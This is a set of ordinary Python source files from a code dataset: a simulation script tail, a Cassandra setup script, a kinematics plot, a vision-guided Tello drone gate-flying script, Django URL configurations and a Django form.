15 * \"-\")\n\n # style.use('seaborn-darkgrid')\n # plt.style.use('dark_background')\n\n if RUN_ANIMATION:\n my_animation = Animation(my_sim)\n my_sim.env.process(my_animation.run_animation())\n start = time.process_time()\n my_sim.run(SIM_TIME)\n for key, val in my_sim.KPIs.items():\n print(\"{} = {}\".format(key, val))\n 
print(\"\\n\")\n print('Time taken to run simulation = {}'.format(time.process_time() - start))\n print(\"\\n\\n\")\n plt.show()\n", "sub_path": "sim2.py", "file_name": "sim2.py", "file_ext": "py", "file_size_in_byte": 24296, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "simpy.rt.RealtimeEnvironment", "line_number": 39, "usage_type": "call"}, {"api_name": "simpy.rt", "line_number": 39, "usage_type": "attribute"}, {"api_name": "simpy.Environment", "line_number": 42, "usage_type": "call"}, {"api_name": "pandas.ExcelFile", "line_number": 105, "usage_type": "call"}, {"api_name": "pandas.read_excel", "line_number": 106, "usage_type": "call"}, {"api_name": "pandas.read_excel", "line_number": 109, "usage_type": "call"}, {"api_name": "Systems.recvBay.RecvBays", "line_number": 118, "usage_type": "call"}, {"api_name": "pandas.read_excel", "line_number": 122, "usage_type": "call"}, {"api_name": "pandas.read_excel", "line_number": 128, "usage_type": "call"}, {"api_name": "Utilities.recvsilos.RecvSilos", "line_number": 134, "usage_type": "call"}, {"api_name": "pandas.read_excel", "line_number": 140, "usage_type": "call"}, {"api_name": "Systems.plant.Plants", "line_number": 145, "usage_type": "call"}, {"api_name": "Agents.truck.Truck", "line_number": 170, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.pause", "line_number": 179, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 179, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 288, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 288, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 332, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 332, "usage_type": "name"}, {"api_name": "random.randint", "line_number": 360, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 367, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 376, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 377, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 378, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 379, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 381, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 382, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 385, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 386, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 387, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 391, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 392, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 396, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 399, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 400, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 401, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 405, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 406, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 417, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 430, "usage_type": "attribute"}, {"api_name": "datetime.datetime.fromtimestamp", "line_number": 432, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 432, 
"usage_type": "attribute"}, {"api_name": "time.time", "line_number": 432, "usage_type": "call"}, {"api_name": "random.seed", "line_number": 433, "usage_type": "call"}, {"api_name": "time.clock", "line_number": 434, "usage_type": "call"}, {"api_name": "time.clock", "line_number": 438, "usage_type": "call"}, {"api_name": "Animation.animation.Animation", "line_number": 447, "usage_type": "call"}, {"api_name": "time.process_time", "line_number": 449, "usage_type": "call"}, {"api_name": "time.process_time", "line_number": 454, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 456, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 456, "usage_type": "name"}]} +{"seq_id": "183670220", "text": "from cassandra.cluster import Cluster\n\ncluster = Cluster(['172.17.0.2 '])\nsession = cluster.connect()\n\nprint(cluster)\nprint(session)\nsession.execute(\"\"\"\n\n\"\"\")\n\n\"\"\"\nCREATE KEYSPACE IF NOT EXISTS db WITH replication = { 'class': 'SimpleStrategy', 'replication_factor': '2' }\n\"\"\"\n\n\"\"\"\nCREATE TYPE db.articles (id UUID, title text, article_text text, author text, date text, modified text, url text);\n\"\"\"\n\n\"\"\"\nCREATE TYPE db.comments (id UUID, text text, date text, author text, article_url text);\n\"\"\"\n\n\"\"\"\nCREATE TYPE db.tags (id UUID, tag text, article_url text);\n\"\"\"\n\n\"\"\"\nCREATE TABLE db.articles ( id UUID PRIMARY KEY, article_url text, article_title text, author text, date text, modified text, tags list>, comments list> );\n\"\"\"\n\n\"\"\"\nCREATE TABLE db.users (id UUID PRIMARY KEY, name text, email_address text, password text, gravatar_url text);\n\"\"\"\n# https://stackoverflow.com/questions/40713693/inserting-null-values-into-cassandra\n# This is pretty cool. You don't have to set anything to any of these variables. 
Not null, not nothing.\n", "sub_path": "testCassandra.py", "file_name": "testCassandra.py", "file_ext": "py", "file_size_in_byte": 1068, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "cassandra.cluster.Cluster", "line_number": 3, "usage_type": "call"}]} +{"seq_id": "248565178", "text": "import numpy as np\nimport matplotlib.pyplot as plt\n\n\nl1, l2, omega1 = 32, 100, 5\ntheta1_deg = np.arange(0, 361, 1)\ntheta1_rad = [np.deg2rad(th) for th in theta1_deg]\n\ntheta2_rad = np.arccos((-l1 * np.cos(theta1_rad)) / l2) + np.pi\ntheta2_deg = [np.rad2deg(th) for th in theta2_rad]\nl3 = l1 * np.sin(theta1_rad) + l2 * np.sin(theta2_rad)\n\nomega2 = -(l1 * omega1 * np.sin(theta1_rad)) / (l2 * np.sin(theta2_rad))\nv = -l1 * omega1 * np.cos(theta1_rad) - l2 * omega2 * np.cos(theta2_rad)\n\nalpha2 = (l1 * omega1 ** 2 * np.cos(theta1_rad) + l2 * omega2 **\n 2 * np.cos(theta2_rad)) / l2 * np.sin(theta2_rad)\na = l1 * omega1 ** 2 * np.sin(theta1_rad) - l2 * alpha2 * \\\n np.cos(theta2_rad) + l2 * omega2 ** 2 * np.sin(theta2_rad)\n\n# maximum and minimum values\nprint(\"l3(max)={}, v(max)={}, a(max)={}\".format(\n np.max(l3), np.max(v), np.max(a)))\nprint(\"l3(min)={}, v(min)={}, a(min)={}\".format(\n np.min(l3), np.min(v), np.min(a)))\n\n# displacement\nax1 = plt.subplot(211)\nax1.plot(theta1_deg, l3)\nax1.set_title(r\"$l_{1}-\\theta_{1}$\")\nax1.set_xlabel(r\"$\\theta_{1}$\")\nax1.set_ylabel(r\"$l_{1}/(mm)$\")\nax1.grid()\n\n# velocity\nax2 = plt.subplot(223)\nax2.plot(theta1_deg, v)\nax2.set_title(r\"$v-\\theta_{1}$\")\nax2.set_xlabel(r\"$\\theta_{1}$\")\nax2.set_ylabel(r\"$v/(mm/s)$\")\nax2.grid()\n\n# acceleration\nax3 = plt.subplot(224)\nax3.plot(theta1_deg, a)\nax3.set_title(r\"$a-\\theta_{1}$\")\nax3.set_xlabel(r\"$\\theta_{1}$\")\nax3.set_ylabel(r\"$a/(mm/s^{2})$\")\nax3.grid()\n\nplt.show()", "sub_path": "3rd/plot.py", "file_name": "plot.py", "file_ext": "py", "file_size_in_byte": 1448, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "numpy.arange", "line_number": 6, "usage_type": "call"}, {"api_name": "numpy.deg2rad", "line_number": 7, "usage_type": "call"}, {"api_name": "numpy.arccos", "line_number": 9, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 9, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 9, "usage_type": "attribute"}, {"api_name": "numpy.rad2deg", "line_number": 10, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 11, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 13, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 25, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 36, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 36, "usage_type": "name"}, 
{"api_name": "matplotlib.pyplot.subplot", "line_number": 44, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 44, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 51, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 51, "usage_type": "name"}]} +{"seq_id": "485907695", "text": "import numpy as np\nimport cv2\nimport imutils\nimport time\n#import tellopy\n#import av\nfrom djitellopy import Tello\n\ndrone = Tello()\n\ntry:\n drone.connect()\n #drone.wait_for_connection(60.0)\nexcept Exception as ex:\n print(ex)\n exit()\n\n#drone.streamon()\n#print(\"Hello hello hello\")\n#frame_read = drone.get_frame_read()\n\n#camera = frame_read\n#print(\"before\")\n#camera = av.open(drone.get_video_stream())\n#print(\"after\")\n#time.sleep(5)\ntry:\n drone.takeoff()\nexcept:\n drone.land()\n exit()\n#time.sleep(10)\n\ndrone.streamon()\n\ncamera = drone.get_frame_read()\niterators=0\nclose = False\nwhile (True):\n \n\n \n # get_corners():\n ### Grabbing the video feed, \"has frames\" and \"grabbed\" check if\n ###there's a next frame, if there isn't, the feed will stop\n\n ### We'll have \"img\" and \"image\" for different purposes. \"image\" is the\n ### original video on top of which we draw, \"img\" is the one masked and\n ### used for getting contours to know what to draw.\n #try:\n print(\"Camera try\")\n img = camera.frame\n image = camera.frame\n #cv2.imwrite(\"img.png\", img)\n if img is None:\n print(\"none\")\n continue\n #except:\n # print(\"Camera fail\")\n # continue\n #hasFrames, image = camera.read()\n #except:\n # drone.land()\n #grabbed, img = camera.read()\n #image = img\n ### Changing the frame into hsv colors and blurring it in various ways to smoothen\n \"\"\"\n if (iterators == 0):\n drone.move_left(20)\n iterators += 1\n time.sleep(0.5)\n if (iterators == 1):\n drone.move_right(20)\n iterators += 1\n time.sleep(0.5)\n if (iterators == 2):\n drone.land()\n time.sleep(0.5)\n iterators += 2\n \"\"\"\n hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n\n blur_hsv = cv2.GaussianBlur(hsv, (1,1),0)\n blur_hsv = cv2.medianBlur(blur_hsv, 5)\n\n\n ### Create a white mask of the shape and blur the hell out of it\n\n mask = cv2.inRange(blur_hsv,(33, 90, 90), (80, 255, 255) )\n\n blur_mask = cv2.GaussianBlur(mask, (1, 1), 0)\n blur_mask = cv2.medianBlur(blur_mask, 21)\n\n kernel = np.ones((11, 11), np.float32) * 255\n kernelImg = np.zeros([50, 50, 3], dtype=np.uint8)\n kernelImg.fill(255)\n\n mask = cv2.erode(blur_mask, kernel, iterations=3)\n\n mask = cv2.dilate(blur_mask, kernel, iterations=3)\n\n\n ###Resulting \"img\" used for contour counting\n img = blur_mask\n #cv2.imshow('showing', img)\n\n\n ### Gets edges and makes contours out of them and sorts them into a list\n edged = cv2.Canny(img, 10, 550)\n edged = cv2.medianBlur(edged, 1)\n #cv2.imshow('Filming', edged)\n\n cnts = cv2.findContours(img.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n cnts = imutils.grab_contours(cnts)\n\n #hull = np.array([[[5,5]],[[5,5]]])\n\n ### Empty list to be used later\n lista = np.array([])\n count = 0\n\n ###\n for c in cnts:\n\n ### approximate the contour and set minimum length fo rrecongised contours\n peri = cv2.arcLength(c, True)\n if peri >= 410:\n print(\"contours\")\n approx = cv2.approxPolyDP(c, 0.05 * peri, True)\n\n ### Collect long enough contours into the list\n lista = np.append(lista,approx).astype(int)\n count += len(approx)\n\n else:\n continue\n\n ### If there are between 4 and 10 corners, draw the contour on the 
\"image\"\n if len(approx) >= 4 and len(approx) <= 10:\n #cv2.imwrite(\"Test.png\", image)\n cv2.drawContours(image, [approx], -1, (0, 0, 255), 5)\n\n try:\n ### This is \"try\", because all frames don't have contours and otherwise it would end the code\n print(\"try listing\") \n lista = np.reshape(lista, (count, 2))\n\n except:\n continue\n\n mask2 = cv2.inRange(image, (0, 0, 250), (0, 0, 255))\n gray = mask2\n \n inline = False\n inlevel = False\n centered = False\n \n\n try:\n ### Draw the connecting contour (green) and use convex hull to surround it to get outermost edges and corners\n print(\"trying to get contours\")\n cv2.drawContours(image, [lista], -1, (0, 255, 0), 5)\n hull = cv2.convexHull(lista)\n cv2.drawContours(image,[hull], -1, (255,0,0),5)\n mask3 = cv2.inRange(image, (252, 0, 0), (255, 0, 0))\n\n corners = cv2.goodFeaturesToTrack(mask3, 4, 0.05, 110)\n corners = np.int0(corners)\n \n print(\"halfway contours\")\n ### This get and draws he center of gate\n ret, labels, stats, centroids = cv2.connectedComponentsWithStats(mask3)\n mask3 = cv2.cvtColor(mask3, cv2.COLOR_GRAY2BGR)\n for i in centroids[1:]:\n cv2.rectangle(image, (int(i[0]), int(i[1])), (int(i[0] + 5), int(i[1] + 5)), (255, 0, 0), 3)\n ### And this gets the center of image frame\n center_width = int(image.shape[1]/2)\n center_height = int(image.shape[0]/2)\n cv2.circle(image, (center_width, center_height), 10, (0, 0, 255), -1)\n print(\"end contours\")\n ### Here we compare the two different centers to determine where to move\n #cv2.imshow(\"image\", image)\n #cv2.imshow(\"img\", img)\n\n\n if center_width - centroids[1][0] > 35:\n print('Fly Left')\n drone.move_left(20)\n time.sleep(0.1)\n \n elif center_width - centroids[1][0] < -35:\n print('Fly Right')\n drone.move_right(20)\n time.sleep(0.25)\n \n else:\n print('Stay in line')\n inline = True\n\n if center_height - centroids[1][1] > 105:\n print('Fly Up')\n drone.move_up(20)\n time.sleep(0.25)\n\n elif center_height - centroids[1][1] < 45:\n print('Fly Down')\n drone.move_down(20)\n time.sleep(0.25)\n else:\n print('Stay in Level')\n inlevel = True\n time.sleep(0.25)\n\n ### Draws yellow corners on \"image\"\n for i in corners:\n x, y = i.ravel()\n cv2.circle(image, (x, y), 1, (0,255,255), -1)\n\n\n target = [0,255,255]\n X,Y = np.array(np.where(np.all(image==target, axis=2)))\n\n coordinates = np.array([])\n for c in range(0,19,5):\n coordinates = np.append(coordinates,X[c])\n coordinates = np.append(coordinates, Y[c])\n\n coordinates = np.reshape(coordinates,(4,2))\n\n except:\n drone.rotate_counter_clockwise(15)\n time.sleep(0.25)\n print(\"didn't get contours\")\n \n continue\n\n #cv2.imshow(\"gate2\", image)\n\n #time.sleep(0.05)\n\n #if cv2.waitKey(1) & 0xFF == ord('q'):\n #break\n\n\n #cv2.imshow(\"gate2\", image)\n\n # cv2.imshow('Filming', img)\n #time.sleep(0.05)\n\n #if cv2.waitKey(1) & 0xFF == ord('q'):\n #break\n bot_left = np.argmin(coordinates[2:4,1]) + 2\n top_left = np.argmin(coordinates[0:2,1])\n bot_right = np.argmax(coordinates[2:4,1]) + 2\n top_right = np.argmax(coordinates[0:2,1])\n try:\n \n\n #print(coordinates[bot_left])\n #print(coordinates[2])\n if (coordinates[bot_left][0] - coordinates[top_left][0]) - (coordinates[bot_right][0] - coordinates[top_right][0]) >6:\n #print()\n #print('Rotate to Left ')\n #print()\n drone.rotate_counter_clockwise(5)\n time.sleep(0.25)\n \n if (coordinates[bot_right][0] - coordinates[top_right][0]) - (coordinates[bot_left][0] - coordinates[top_left][0]) >6:\n #print()\n #print('Rotate to Right ')\n 
#print()\n                drone.rotate_clockwise(5)\n                time.sleep(0.25)\n\n            else:\n                #print()\n                #print('Centered')\n                #print()\n                centered = True\n            \n            if (coordinates[bot_left][0] - coordinates[top_left][0]) < 490 and close == False:\n                speed = 2.5/(coordinates[bot_left][0] - coordinates[top_left][0])*4900\n                print(speed)\n                if speed < 20:\n                    speed = 20\n                drone.move_forward(int(speed))\n                #close = False\n            else:\n                close = True\n\n    except:\n        print(\"rotate exception\")\n        continue\n\n    try:\n        leftRightDist = (coordinates[bot_left][0] - coordinates[top_left][0])>(coordinates[bot_right][0] - coordinates[top_right][0])\n        if ((leftRightDist and (coordinates[top_right][1]-coordinates[top_left][1])<200) and close):\n            drone.move_right(20)\n            print(\"moving right\")\n            time.sleep(0.25)\n        elif ((not leftRightDist and (coordinates[top_right][1]-coordinates[top_left][1])<200) and close):\n            drone.move_left(20)\n            print(\"moving left\")\n            time.sleep(0.25)\n        \n    except:\n        print(\"Angle exception\")\n        \n    print(inline, inlevel, centered, close)\n    if inline and inlevel and centered and close:\n        cv2.imwrite(\"img.png\", img)\n        cv2.imwrite(\"image.png\", image)\n        drone.move_forward(250)\n        time.sleep(0.25)\n        break\n    \ntime.sleep(0.5)\ndrone.land()\n#drone.quit()\ncamera.release()\n#cv2.destroyAllWindows()\n\n\n", "sub_path": "FlyingTest.py", "file_name": "FlyingTest.py", "file_ext": "py", "file_size_in_byte": 9199, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "djitellopy.Tello", "line_number": 9, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 81, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2HSV", "line_number": 81, "usage_type": "attribute"}, {"api_name": "cv2.GaussianBlur", "line_number": 83, "usage_type": "call"}, {"api_name": "cv2.medianBlur", "line_number": 84, "usage_type": "call"}, {"api_name": "cv2.inRange", "line_number": 89, "usage_type": "call"}, {"api_name": "cv2.GaussianBlur", "line_number": 91, "usage_type": "call"}, {"api_name": "cv2.medianBlur", "line_number": 92, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 94, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 94, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 95, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 95, "usage_type": "attribute"}, {"api_name": "cv2.erode", "line_number": 98, "usage_type": "call"}, {"api_name": "cv2.dilate", "line_number": 100, "usage_type": "call"}, {"api_name": "cv2.Canny", "line_number": 109, "usage_type": "call"}, {"api_name": "cv2.medianBlur", "line_number": 110, "usage_type": "call"}, {"api_name": "cv2.findContours", "line_number": 113, "usage_type": "call"}, {"api_name": "cv2.RETR_EXTERNAL", "line_number": 113, "usage_type": "attribute"}, {"api_name": "cv2.CHAIN_APPROX_SIMPLE", "line_number": 113, "usage_type": "attribute"}, {"api_name": "imutils.grab_contours", "line_number": 114, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 119, "usage_type": "call"}, {"api_name": "cv2.arcLength", "line_number": 126, "usage_type": "call"}, {"api_name": "cv2.approxPolyDP", "line_number": 129, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 132, "usage_type": "call"}, {"api_name": "cv2.drawContours", "line_number": 141, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 146, "usage_type": "call"}, {"api_name": "cv2.inRange", "line_number": 151, "usage_type": "call"}, {"api_name": "cv2.drawContours", "line_number": 162, 
"usage_type": "call"}, {"api_name": "cv2.convexHull", "line_number": 163, "usage_type": "call"}, {"api_name": "cv2.drawContours", "line_number": 164, "usage_type": "call"}, {"api_name": "cv2.inRange", "line_number": 165, "usage_type": "call"}, {"api_name": "cv2.goodFeaturesToTrack", "line_number": 167, "usage_type": "call"}, {"api_name": "numpy.int0", "line_number": 168, "usage_type": "call"}, {"api_name": "cv2.connectedComponentsWithStats", "line_number": 172, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 173, "usage_type": "call"}, {"api_name": "cv2.COLOR_GRAY2BGR", "line_number": 173, "usage_type": "attribute"}, {"api_name": "cv2.rectangle", "line_number": 175, "usage_type": "call"}, {"api_name": "cv2.circle", "line_number": 179, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 189, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 194, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 203, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 208, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 212, "usage_type": "call"}, {"api_name": "cv2.circle", "line_number": 217, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 221, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 221, "usage_type": "call"}, {"api_name": "numpy.all", "line_number": 221, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 223, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 225, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 226, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 228, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 232, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 252, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 253, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 254, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 255, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 266, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 273, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 300, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 304, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 311, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 312, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 314, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 317, "usage_type": "call"}]} +{"seq_id": "339236833", "text": "from django.urls import path\nfrom movieinfo import views\n\nurlpatterns = [\n path(\"\", views.index, name=\"index\"),\n path(\"movies/\", views.movie_list, name=\"movies_list\"),\n path(\"/\", views.actor_detail, name=\"actor_detail\"),\n path(\"/movies//\",\n views.movie_detail, name=\"movie_detail\"),\n path(\"actors/new/\", views.actor_new, name=\"actor_new\"),\n path(\"/movies/new/\",\n views.movie_new, name=\"movie_new\"),\n path(\"/movies//reviews/new/\",\n views.review_new, name=\"review_new\"),\n path(\n \"/movies//reviews//edit/\", views.review_edit, name=\"review_edit\"\n ),\n path(\n \"/movies//reviews//delete/\",\n views.review_delete,\n name=\"review_delete\",\n ),\n path(\"/movies//videos/new/\",\n views.video_new, name=\"video_new\"),\n\n]\n", "sub_path": "과제 20210806/03 송예지/movieinfo/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 954, 
"program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "django.urls.path", "line_number": 5, "usage_type": "call"}, {"api_name": "movieinfo.views.index", "line_number": 5, "usage_type": "attribute"}, {"api_name": "movieinfo.views", "line_number": 5, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 6, "usage_type": "call"}, {"api_name": "movieinfo.views.movie_list", "line_number": 6, "usage_type": "attribute"}, {"api_name": "movieinfo.views", "line_number": 6, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 7, "usage_type": "call"}, {"api_name": "movieinfo.views.actor_detail", "line_number": 7, "usage_type": "attribute"}, {"api_name": "movieinfo.views", "line_number": 7, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "movieinfo.views.movie_detail", "line_number": 9, "usage_type": "attribute"}, {"api_name": "movieinfo.views", "line_number": 9, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}, {"api_name": "movieinfo.views.actor_new", "line_number": 10, "usage_type": "attribute"}, {"api_name": "movieinfo.views", "line_number": 10, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 11, "usage_type": "call"}, {"api_name": "movieinfo.views.movie_new", "line_number": 12, "usage_type": "attribute"}, {"api_name": "movieinfo.views", "line_number": 12, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 13, "usage_type": "call"}, {"api_name": "movieinfo.views.review_new", "line_number": 14, "usage_type": "attribute"}, {"api_name": "movieinfo.views", "line_number": 14, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 15, "usage_type": "call"}, {"api_name": "movieinfo.views.review_edit", "line_number": 16, "usage_type": "attribute"}, {"api_name": "movieinfo.views", "line_number": 16, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 18, "usage_type": "call"}, {"api_name": "movieinfo.views.review_delete", "line_number": 20, "usage_type": "attribute"}, {"api_name": "movieinfo.views", "line_number": 20, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 23, "usage_type": "call"}, {"api_name": "movieinfo.views.video_new", "line_number": 24, "usage_type": "attribute"}, {"api_name": "movieinfo.views", "line_number": 24, "usage_type": "name"}]} +{"seq_id": "309922850", "text": "from django.conf.urls import url\nfrom users.views import *\n\nurlpatterns = [\n\turl(r'^web/user/get/select/$', UserCreateAPIView.as_view(), name=\"get_select\"),\n\turl(r'^web/user/set/insert/$', UserCreateAPIView.as_view(), name=\"set_user\"),\n\turl(r'^web/user/set/password/$', ResetPassword.as_view(), name=\"reset_password\"),\n\turl(r'^web/logout/$', Logout.as_view(), name=\"logout\"),\n\turl(r'^web/user/get/select/(?P[0-9]+)/$', UserDetailAPIView.as_view(), name=\"detail_user\"),\n\turl(r'^web/user/set/update/(?P[0-9]+)/$', UserDetailAPIView.as_view(), name=\"update_user\"),\n\turl(r'^web/user/set/delete/(?P[0-9]+)/$', UserDetailAPIView.as_view(), name=\"delete_user\"),\n\n\turl(r'^web/type_user/get/select/$', TypeUserListAPIView.as_view(), name=\"list_type_user\"),\n\turl(r'^web/type_user/set/insert/$', TypeUserListAPIView.as_view(), name=\"insert_type_user\"),\n\turl(r'^web/type_user/set/update/(?P[0-9]+)/$', TypeUserDetailAPIView.as_view(), 
name=\"update_type_user\"),\n\turl(r'^web/type_user/set/delete/(?P[0-9]+)/$', TypeUserDetailAPIView.as_view(), name=\"delete_type_user\"),\n\turl(r'^web/type_user/get/select/(?P[0-9]+)/$', TypeUserDetailAPIView.as_view(), name=\"select_type_user\"),\n\turl(r'^web/type_user/get/sselect/$', TypeUserComboAPIView.as_view(), name=\"combo_type_user\"),\n\n\turl(r'^web/userapp/set/insert/$', SysUserAppCreateAPIView.as_view(), name=\"set_userapp\"),\n\turl(r'^web/userapp/get/select/$', SysUserAppCreateAPIView.as_view(), name=\"select_userapp\"),\n\turl(r'^web/userapp/set/update/(?P[0-9]+)/$', SysUserAppDetailAPIView.as_view(), name=\"detail_userapp\"),\n\turl(r'^web/userapp/get/select/(?P[0-9]+)/$', SysUserAppDetailAPIView.as_view(), name=\"get_select\"),\n\turl(r'^web/userapp/set/delete/(?P[0-9]+)/$', SysUserAppDetailAPIView.as_view(), name=\"set_delete\"),\n\n\turl(r'^web/configuration/get/select/$', ConfigurationAPIView.as_view(), name=\"get_configuration\"),\n\turl(r'^web/configuration/set/update/$', ConfigurationAPIView.as_view(), name=\"update_configuration\"),\n]\n", "sub_path": "tmp/users/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 1993, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "django.conf.urls.url", "line_number": 5, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 6, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 7, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 8, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 9, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 10, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 11, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 13, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 14, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 15, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 16, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 17, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 18, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 20, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 21, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 22, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 23, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 24, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 26, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 27, "usage_type": "call"}]} +{"seq_id": "41153333", "text": "import json\n\n\nfrom django import forms\n\nfrom .models import GenericModel\nfrom .utils import get_form_fields\n\n\nclass FlexibleForm(forms.ModelForm):\n\n def __init__(self, *args, instance=None, **kwargs):\n super(FlexibleForm, self).__init__(*args, instance=instance, **kwargs)\n\n if instance:\n initials = json.loads(instance.data)\n else:\n initials = {}\n\n self._extra_fields = get_form_fields(initials)\n\n 